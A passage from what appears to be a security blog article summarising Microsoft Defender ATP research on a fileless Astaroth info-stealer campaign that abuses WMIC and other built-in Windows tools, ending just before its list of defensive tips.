The Microsoft Defender ATP Research Team released a report covering a malware campaign that dropped the Astaroth trojan into the memory of infected computers. This particular campaign was notable in its distribution method and complex attack chain. It used fileless distribution techniques to hide its activities from security solutions, and abused different legitimate Windows software features to spread quietly.
Discovered in 2017, Astaroth is known as an information stealer. It is capable of taking sensitive information from an affected user — account credentials, keystrokes, and other data — and sending it to the attacker.
During a standard telemetry review, a researcher from the Microsoft Defender ATP Research Team, Andrea Lelli, noted a spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script, which indicated a fileless technique being used. Upon further investigation, Lelli discovered the Astaroth campaign where attackers were attempting to install the malware directly in the memory of victim devices.
The malware campaign actually runs legitimate Windows tools, which will download additional code and then pass it on. This chain of action is executed in memory, without saving any files on the disk, making it a “fileless execution.” The fileless nature of the campaign makes it difficult for traditional antivirus tools to detect it, although more advanced security solutions are able to defend against such a threat.
Lelli notes that this malware campaign completely “lives off the land,” given that all files run during the attack chain are system tools. By abusing legitimate tools already present on the target system, it tries to disguise its actions as regular activity.
Dealing with fileless threats
This use of fileless techniques is not new. In fact, in 2018, we saw an uptick in fileless events. And cybercriminals continue to use fileless techniques to update old malware.
But while fileless threats may not be as visible as more traditional ones, they leave telltale signs that can be detected by IT and security teams. Here are some ways enterprises can stay ahead of fileless threats: